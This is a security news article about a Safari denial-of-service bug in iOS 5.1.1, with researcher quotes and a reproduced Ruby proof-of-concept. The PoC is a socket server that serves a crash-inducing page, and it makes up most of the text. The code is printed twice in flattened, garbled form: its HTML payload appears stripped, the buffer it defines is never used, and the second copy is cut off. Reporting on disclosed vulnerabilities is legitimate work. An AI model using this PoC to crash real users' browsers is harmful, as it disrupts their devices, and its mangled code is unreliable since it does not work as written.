Access member only content, take part in discussions with comments on blogs, news and reviews and receive all the latest security industry news directly to your inbox. Join now for free.
Processing registration... Please wait.
This process can take up to a minute to complete.
A confirmation email has been sent to your email address - SUPPLIED EMAIL HERE. Please click on the link in the email to verify your email address. You need to verify your email before you can start posting.
If you do not receive your confirmation email within the next few minutes, it may be because the email has been captured by a junk mail filter. Please ensure you add the domain @scmagazine.com.au to your white-listed senders.
A denial of service attack has been disclosed in the latest version of Apple iOS.
The attack targets Safari in iOS 5.1.1 and a proof of concept was published online.
Alienvault security researcher Alberto Ortega said the attack may also affect previous versions of the Apple operating system.
The attack was successfully demonstrated on iPhone, iPad and iPod Touch.
Ortega told SC Magazine the error was a "step to achieve a real exploitation".
"iOS has a lot of mitigations to avoid successful exploitation," Ortega said. "This software has errors and holes but you will need to bypass those hard mitigations and find more weaknesses to have something "usable'."
Ortega reported the error to Apple at the time of disclosure but had no response from the notoriously security silent company.
“When JavaScript function match() gets a big buffer as parameter the browser unexpectedly crashes. By extension, the function search() is affected too,” Ortega said in the advisory.
require "socket" require "optparse" # Buffer values chr = "A" # The size of buffer needed may vary depending # on the device and the iOS version. buffer_len = 925000 # Magic packet body = "\ \n\ Crash PoC\n\ \n\ "; def help() puts "iOS <= v5.1.1 Safari Browser JS match(), search() Crash PoC" puts "#{$0} -p bind_port [-h bind_address] [--verbose]" end # Parsing options opts = {} optparser = OptionParser.new do |op| op.on("-h", "--host HOST") do |p| opts["host"] = p end op.on("-p", "--port PORT") do |p| opts["port"] = p end op.on("-v", "--verbose") do |p| opts["verbose"] = true end end begin optparser.parse! rescue help() exit 1 end if (opts.length == 0 || opts["port"] == nil) help() exit 1 end if (opts["verbose"] != nil) debug = true else debug = false end if (opts["host"] != nil) host = opts["host"] else host = "0.0.0.0" end port = opts["port"] # Building server if debug puts "Buffer -> #{chr}*#{buffer_len}" end begin serv = TCPServer.new(host, port) puts "Listening on #{host}:#{port.to_s} ..." rescue puts "Error listening on #{host}:#{port.to_s}" exit 1 end begin s = serv.accept() if debug puts "Client connected, waiting petition ..." end data = s.recv(1000) if debug puts "Sending crafted packet ..." end s.print(body) if debug puts "Closing connection ..." end s.close() puts "Done!" rescue puts "Error sending data" exit 1 end
require "socket" require "optparse" # Buffer values chr = "A" # The size of buffer needed may vary depending # on the device and the iOS version. buffer_len = 925000 # Magic packet body = "\ \n\ Crash PoC\n\ \n\ "; def help() puts "iOS <= v5.1.1 Safari Browser JS match(), search() Crash PoC" puts "#{$0} -p bind_port [-h bind_address] [--verbose]" end # Parsing options opts = {} optparser = OptionParser.new do |op| op.on("-h", "--host HOST") do |p| opts["host"] = p end op.on("-p", "--port PORT") do |p| opts["port"] = p end op.on("-v", "--verbose") do |p| opts["verbose"] = true end end begin optparser.parse! rescue help() exit 1 end if (opts.length == 0 || opts["port"] == nil) help() exit 1 end if (opts["verbose"] != nil) debug = true else debug = false end if (opts["host"] != nil) host = opts["host"] else host = "0.0.0.0" end port = opts["port"] # Building server if debug puts "Buffer -> #{chr}*#{buffer_len}" end begin serv = TCPServer.new(host, port) puts "Listening on #{host}:#{port.to_s} ..." rescue puts "Error listening on #{host}:#{port.to_s}" exit 1 end begin s = serv.accept() if debug puts "Client connected, waiting petition ..." end data = s.recv(1000) if debug puts "Sending crafted packet ..." end s.print(body) if debug puts "Closing connection ..." end s.close() puts "Done!" rescue puts "Error sending data" exit 1
Copyright © SC Magazine, Australia
To begin commenting right away, you can log in below or register an account if you don't yet have one. Please read our guidelines on commenting. Offending posts will be removed and your access may be suspended. Abusive or obscene language will not be tolerated. The comments below do not necessarily reflect the views or opinions of SC Magazine, Haymarket Media or its employees.
